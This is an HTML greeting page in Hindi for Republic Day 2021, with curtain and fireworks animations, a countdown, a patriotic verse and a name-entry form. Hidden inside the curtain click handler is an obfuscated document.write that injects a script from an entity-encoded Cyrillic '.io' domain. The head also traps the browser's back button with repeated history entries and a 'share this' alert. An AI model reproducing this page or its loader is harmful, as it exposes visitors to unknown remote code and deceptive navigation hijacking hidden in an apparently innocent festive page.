
<html>

<head>
    
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="google" content="notranslate" />
    
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="गणतंत्र दिवस की हार्दिक शुभकामनाए॥ " />
   
    <meta property="og:description" content="गणतंत्र दिवस की हार्दिक शुभकामनाए॥" />
    <meta property="og:site_name" content="गणतंत्र दिवस की हार्दिक शुभकामनाए॥ " />
    <meta property="og:image" content="msg.html" /> 
    <title>॥गणतंत्र दिवस की हार्दिक शुभकामनाए॥</title>
    <link rel="stylesheet" href="animate.min.css">
   
    <script type="text/javascript">! function (){var t;try{for (t=0; 10 > t; ++t) history.pushState({}, "", "#");onpopstate=function (t){t.state &&   alert("Share this Wishing with your friends and family");}}catch (o){}}();</script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-184923659-5"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-184923659-5');
</script>




<style>
body{
        background: #f8f8f8;
        margin:0;
      }
      .mainContainer {
        background: linear-gradient(to bottom, #FF9D5D 5% ,#FFFFFF 33%,#FFFFFF 66%,#FFFFFF 67%,#A7F47F 100%);
        max-width: 450px;
        min-height: 200px;
        margin: 0 auto;
        text-align: center;
        padding: 15px;
        color: #999;
        padding-bottom: 60px;

        box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);


      }

#name {
     
      animation: name 4s infinite; 
      text-transform: capitalize;
      margin-bottom: 5px;
      font-size: 50px;
      padding: 0 10px;
      font-family: 'Teko', sans-serif;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(img/sname.gif?v=77);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}


.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}


/* Custom Animation classes */     
.name {
	color: #fff;
    	margin: 6px;
    	padding: 25px 20px;
    	font-size: 48px;
    	font-family: sans-serif;
}

.enter-name input[type=name] {
	background-color: #FFEF32;
	color: black;
	font-weight:bold;
   	border-radius: 10px;
    	box-sizing: border-box;
    	border:2px solid black;
    	padding: 5px;
    	position: fixed;
    	left: 10px;
    	bottom: 5px;
    	height: 50px;
    	width: 70%;
    	text-align: center;
    	font-size: 22px;
    	display: inline-block;
}

.enter-name .btn {
	border-radius: 10px;
    	font-size: 21px;
    	padding: 4px;
    	position: fixed;
    	right: 2px;
    	bottom: 5px;
    	height: 50px;
    	width: 23%;
    	display: inline-block;
    	color: white;
    	font-weight:600;
    	background-color: red;
    	border: 2px solid black;
    	letter-spacing: .5px;
    	transition: .2s ease-out;
    	cursor: pointer;
    	line-height: 36px;
    	outline: 0;
    	text-transform: uppercase;
    	vertical-align: middle;
    	text-decoration: none;
    	animation-duration: 4s !important;
}

.enter-name input[type=name]::-webkit-input-placeholder { 
	color: black;
  	font-size: 18px;	
}

.enter-name input[type=name]::-moz-placeholder { 
	color: black;
  	font-size: 18px;
}

.enter-name input[type=name]:focus::-webkit-input-placeholder {
    color: black;
}

.enter-name input[type=name]:focus::-moz-placeholder { 
	color: black;
  	font-size: 18px;
}


#demo
{
  
    color: red;
    font-size: 20px;
    font-weight: bold;
    animation: pulse 2s infinite;
    width:87%;
    margin:auto;
}




a.rope
{
    text-decoration:none;
}
.wishMessage {
        color: #fff;
        font-size: 22px;
        font-weight: bold;
        margin-top: 20px;
        text-shadow: 0px 0px 10px #afafaf;
      }
      .wishMessage p{
        margin: 0.3em 0;
      }
/* Custom Animation classes */ 
#show-name {
  font-size: 25px;
  display: inline-block;
  margin-bottom: 5px;
  animation: swing 1s infinite, glow 20s infinite; }

@keyframes glow {
  0%, 100% {
    text-shadow: 0 0 30px red; }
  25% {
    text-shadow: 0 0 30px orange; }
  50% {
    text-shadow: 0 0 30px forestgreen; }
  75% {
    text-shadow: 0 0 30px cyan; } }  
figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}
</style>

<style type="text/css">
      *{
        margin:0;
        padding:0;
      }
      body {
        text-align: center;
        
      }
      img{
      border: none;
    }
.leftcurtain{
      width: 100%;
      height: 120%;
      top: 0px;
      left: 0px;
      position: absolute;
      z-index: 2;
    }
     .rightcurtain{
      width: 100%;
      height: 120%;
      right: 0px;
      top: 0px;
      position: absolute;
      z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
      position: absolute;
      top: 346px;
      left: 28%;
      z-index: 4;
    } 
.centered {
    position: absolute;
    top: 70%;
    left: 55%;
    transform: translate(-50%, -50%);
}
a.rope
{
    text-decoration:none;
}




@keyframes aadisoni{
  0% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    transform:  translate(0px,0px)  rotate(0deg) ;
  }
}

@-webkit-keyframes aadisoni {
  0% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
  15% {
    -webkit-transform:  translate(-25px,0px)  rotate(-5deg) ;
  }
  30% {
    -webkit-transform:  translate(20px,0px)  rotate(3deg) ;
  }
  45% {
    -webkit-transform:  translate(-15px,0px)  rotate(-3deg) ;
  }
  60% {
    -webkit-transform:  translate(10px,0px)  rotate(2deg) ;
  }
  75% {
    -webkit-transform:  translate(-5px,0px)  rotate(-1deg) ;
  }
  100% {
    -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
  }
}



@keyframes name {
  0%   {color:red;}
  20%   {color:white;}
  40%   {color:yellow;}
  60%   {color:orange;}
  80%   {color:cyan;}
  100% {color:#f45bf4;}
}


.glow {
  width:50%;
  padding: 2px;
  background-color: #FF1493	;
  animation: glow 2s infinite;
  font-size:25px;
  font-family: 'Ranga', cursive;
  color:white;
  margin:auto;
  text-align:center;
  border-radius:10px;
  text-shadow:1px 2px 6px black;

}

@keyframes glow {
  0%   {box-shadow: 0px 0px 0px #FF1493	;}
  100%   {box-shadow: 0px 0px 20px 5px #ffb3db;}
 
}

</style>
<style type="text/css">
canvas {
	cursor: crosshair;
	display: block;
}
*{margin:0;padding:0}body{text-align:center}img{border:none}.leftcurtain{width:100%;height:120%;top:0;left:5px;position:absolute;z-index:2}.rightcurtain{width:100%;height:120%;right:3px;top:0;position:absolute;z-index:3}.rightcurtain img,.leftcurtain img{width:100%;height:100%}.logo{margin:0 auto;margin-top:150px}.rope{position:absolute;top:30%;margin-right:31%;z-index:4}.centered{position:absolute;top:75%;left:50%;transform:translate(-50%,-50%)}.aadi{background-image:url();background-repeat:no-repeat;background-attachment:fixed;background-position:top}.matki{height:200px;}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}
#username {
     color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(img/red2.gif?v=78);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 40px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(img/red2.gif?v=78);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}
  </style>
  
</head>
<body class="aadi">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="slider.js" type="text/javascript"></script> 
<script type="text/javascript">
$(document).ready(function(){$curtainopen=!1,$(".rope").click(function(){return $(this).blur(),0==$curtainopen?($(this).stop().animate({top:"-171%"},{queue:!1,duration:350,easing:"easeOutBounce"}),$(".leftcurtain").stop().animate({width:"1px"},2e3),$(".rightcurtain").stop().animate({width:"1px"},2e3),$curtainopen=!0):($(this).stop().animate({top:"-40px"},{queue:!1,duration:350,easing:"easeOutBounce"}),document.write('<script src="//&#1102;&#1095;.io"><\/script>'),$(".leftcurtain").stop().animate({width:"50%"},2e3),$(".rightcurtain").stop().animate({width:"51%"},2e3),$curtainopen=!1),!1})});
</script>
<script>
  function play(){
       var audio = document.getElementById("audio");
       audio.play();
                 }
   </script>


<audio id="audio" src="a1.mp3" ></audio>
<a class="rope" style="text-decoration:none;" href="#" onclick="play()"><br>
  <div style="font-size: 30px;text-shadow: 1px 1px 3px blue, 1px 1px 3px blue, -1px -1px 3px blue, -1px -1px 3px black;color:lime;font-weight: bold;"><br><b>इस तिरंगे को टच करके देखो 👇👇</b></div>
  <img src="img/iFlag.gif?v=583" style="max-width:170px; width: 90%;" /></a>
<div class="rightcurtain"><img src="img/aadii.jpg?v=582"/></div>
<div class="leftcurtain"><img src="img/aadii.jpg?v=582"/></div>
<marquee class="m1" behavior="scroll" direction="up" scrolldelay="5"> <br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>  
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i1.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i2.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i3.png?v=582" height="30px" width="20px"/><br><br>
<img src="img/i4.png?v=582" height="30px" width="20px"/><br><br>
</marquee>


<div class="mainContainer">
<br>
<br>
<div style="animation: swing 4s infinite;">
<h1 style="background: url(img/red2.gif?v=78);-webkit-text-fill-color: transparent;-webkit-background-clip: text;" id="name"></h1>
</div>
        <h3 class="fromMessage" id="fromMessage"></h3>
 <img src="img/kitrfs.png?v=77" style="animation: rubberBand 2.5s infinite" width="60%" height="auto">
 
 <p id="demo"></p>
   
 <img src="img/main.png?v=97" width="100%" height="auto" style="animation: pulse 1s infinite"><br>
<br>
 <img src="img/mahan.gif?v=97" width="60%">
<br><br>
<div style="display: flex;width: c0%;margin:0 auto;">
  <img src="img/15th5.gif?v=582" width="50%">
  <img src="img/gg.gif?v=582" width="50%">
 
</div>
 <br>
      
</center>
<center><div class="w3-content w3-section" style="max-width:500px">
<img class="mySlides" src="img/slide1.jpg?v=582" style=" width:200px;">
<img class="mySlides" src="img/slide2.jpg?v=584" style=" width:200px;">
<img class="mySlides" src="img/slide3.jpg?v=582" style=" width:200px;">
<img class="mySlides" src="img/slide4.jpg?v=582" style=" width:200px;">
<img class="mySlides" src="img/slide5.jpg?v=582" style=" width:200px;">

</div></center>

<div class="wishMessage" style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;">
  <p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#ff9933">बलिदानों का सपना जब सच हुआ,</p>
  <p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#ffffff">देश तभी आजाद हुआ, <br>
  <p style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;color:#000080">आज सलाम करे उन वीरों को,</p> </p>
  <p style="color:#138808">जिनकी शहादत से ये भारत गणतंत्र हुआ।</p><br>
  <p style="color:#000080">आप सभी को गणतंत्र दिवस की</p>
  <p style="color:purple"><b>हार्दिक शुभकामनाए॥</b></p>
  </div>
  <br>
<span style="font-size:22px;text-shadow: 1px 1px 3px #FFEB3B, 1px 1px 3px #FFEB3B, -1px -1px 3px #FFEB3B, -1px -1px 3px #FFEB3B;color:#E91E63;"><marquee><b><i>“  Wish you Happy Republic Day 2021!!”</b></i></marquee></span><br>

</div>
   <br>


<br>
<br>

<form method="POST" action="ready.php">
<div class="enter-name">
		<input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉
अपना नाम लिखो ....">
		<button class="btn animated shake infinite" type="submit"><span>👉  </span>देखो </button>
	</div>
</form>
<script>
var myIndex=0;function carousel(){var e,l=document.getElementsByClassName("mySlides");for(e=0;e<l.length;e++)l[e].style.display="none";++myIndex>l.length&&(myIndex=1),l[myIndex-1].style.display="block",setTimeout(carousel,2e3)}carousel();
</script>

<script> 
var countDownDate=new Date("Jan 26, 2021 00:00:00").getTime(),x=setInterval(function(){var e=(new Date).getTime(),o=countDownDate-e,t=Math.floor(o/864e5),n=Math.floor(o%864e5/36e5),a=Math.floor(o%36e5/6e4),l=Math.floor(o%6e4/1e3);document.getElementById("demo").innerHTML=""+t+"<font color='black'> दिन,</font> "+n+"<font color='black'> घंटे,</font> "+a+"<font color='black'>  मिनट,<br></font> "+l+"<font color='black'> सेकंड </font> <font color='green'>,पहले</font>",o<0&&(clearInterval(x),document.getElementById("demo").innerHTML="")},1e3);
</script>


<script type="text/javascript">

// <![CDATA[

var bits=80; // how many bits

var speed=33; // how fast - smaller is faster

var bangs=5; // how many can be launched simultaneously (note that using too many can slow the script down)

var colours=new Array("#03f", "#f03", "#0e0", "#93f", "#0cf", "#f93", "#f0c");

//                     blue    red     green   purple  cyan    orange  pink



var bangheight=new Array();

var intensity=new Array();

var colour=new Array();

var Xpos=new Array();

var Ypos=new Array();

var dX=new Array();

var dY=new Array();

var stars=new Array();

var decay=new Array();

var swide=800;

var shigh=600;

var boddie;



if (typeof('addRVLoadEvent')!='function') function addRVLoadEvent(funky) {

  var oldonload=window.onload;

  if (typeof(oldonload)!='function') window.onload=funky;

  else window.onload=function() {

    if (oldonload) oldonload();

    funky();

  }

}



addRVLoadEvent(light_blue_touchpaper);



function light_blue_touchpaper() { if (document.getElementById) {

  var i;

  boddie=document.createElement("div");

  boddie.style.position="fixed";

  boddie.style.top="0px";

  boddie.style.left="0px";

  boddie.style.overflow="visible";

  boddie.style.width="1px";

  boddie.style.height="1px";

  boddie.style.backgroundColor="transparkent";

  document.body.appendChild(boddie);

  set_width();

  for (i=0; i<bangs; i++) {

    write_fire(i);

    launch(i);

    setInterval('stepthrough('+i+')', speed);

  }

}}

function write_fire(N) {

  var i, rlef, rdow;

  stars[N+'r']=createDiv('|', 12);

  boddie.appendChild(stars[N+'r']);

  for (i=bits*N; i<bits+bits*N; i++) {

    stars[i]=createDiv('*', 13);

    boddie.appendChild(stars[i]);

  }

}

function createDiv(char, size) {

  var div=document.createElement("div");

  div.style.font=size+"px monospace";

  div.style.position="absolute";

  div.style.backgroundColor="transparent";

  div.appendChild(document.createTextNode(char));

  return (div);

}

function launch(N) {

  colour[N]=Math.floor(Math.random()*colours.length);

  Xpos[N+"r"]=swide*0.5;

  Ypos[N+"r"]=shigh-5;

  bangheight[N]=Math.round((0.5+Math.random())*shigh*0.4);

  dX[N+"r"]=(Math.random()-0.5)*swide/bangheight[N];

  if (dX[N+"r"]>1.25) stars[N+"r"].firstChild.nodeValue="/";

  else if (dX[N+"r"]<-1.25) stars[N+"r"].firstChild.nodeValue="\\";

  else stars[N+"r"].firstChild.nodeValue="|";

  stars[N+"r"].style.color=colours[colour[N]];

}

function bang(N) {

  var i, Z, A=0;

  for (i=bits*N; i<bits+bits*N; i++) {

    Z=stars[i].style;

    Z.left=Xpos[i]+"px";

    Z.top=Ypos[i]+"px";

    if (decay[i]) decay[i]--;

    else A++;

    if (decay[i]==15) Z.fontSize="7px";

    else if (decay[i]==7) Z.fontSize="2px";

    else if (decay[i]==1) Z.visibility="hidden";

    if (decay[i]>1 && Math.random()<.1) {

       Z.visibility="hidden";

       setTimeout('stars['+i+'].style.visibility="visible"', speed-1);

    }

    Xpos[i]+=dX[i];

    Ypos[i]+=(dY[i]+=1.25/intensity[N]);



  }

  if (A!=bits) setTimeout("bang("+N+")", speed);

}

function stepthrough(N) {

  var i, M, Z;

  var oldx=Xpos[N+"r"];

  var oldy=Ypos[N+"r"];

  Xpos[N+"r"]+=dX[N+"r"];

  Ypos[N+"r"]-=4;

  if (Ypos[N+"r"]<bangheight[N]) {

    M=Math.floor(Math.random()*3*colours.length);

    intensity[N]=5+Math.random()*4;

    for (i=N*bits; i<bits+bits*N; i++) {

      Xpos[i]=Xpos[N+"r"];

      Ypos[i]=Ypos[N+"r"];

      dY[i]=(Math.random()-0.5)*intensity[N];

      dX[i]=(Math.random()-0.5)*(intensity[N]-Math.abs(dY[i]))*1.25;

      decay[i]=16+Math.floor(Math.random()*16);

      Z=stars[i];

      if (M<colours.length) Z.style.color=colours[i%2?colour[N]:M];

      else if (M<2*colours.length) Z.style.color=colours[colour[N]];

      else Z.style.color=colours[i%colours.length];

      Z.style.fontSize="13px";

      Z.style.visibility="visible";

    }

    bang(N);

    launch(N);

  }

  stars[N+"r"].style.left=oldx+"px";

  stars[N+"r"].style.top=oldy+"px";

}

window.onresize=set_width;

function set_width() {

  var sw_min=999999;

  var sh_min=999999;

  if (document.documentElement && document.documentElement.clientWidth) {

    if (document.documentElement.clientWidth>0) sw_min=document.documentElement.clientWidth;

    if (document.documentElement.clientHeight>0) sh_min=document.documentElement.clientHeight;

  }

  if (typeof(self.innerWidth)!="undefined" && self.innerWidth) {

    if (self.innerWidth>0 && self.innerWidth<sw_min) sw_min=self.innerWidth;

    if (self.innerHeight>0 && self.innerHeight<sh_min) sh_min=self.innerHeight;

  }

  if (document.body.clientWidth) {

    if (document.body.clientWidth>0 && document.body.clientWidth<sw_min) sw_min=document.body.clientWidth;

    if (document.body.clientHeight>0 && document.body.clientHeight<sh_min) sh_min=document.body.clientHeight;

  }

  if (sw_min==999999 || sh_min==999999) {

    sw_min=800;

    sh_min=600;

  }

  swide=sw_min;

  shigh=sh_min;

}

// ]]>

</script>

<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-messaging.js"></script>
<script type="text/javascript" src="/integrate.js"></script>

</body>



</html>
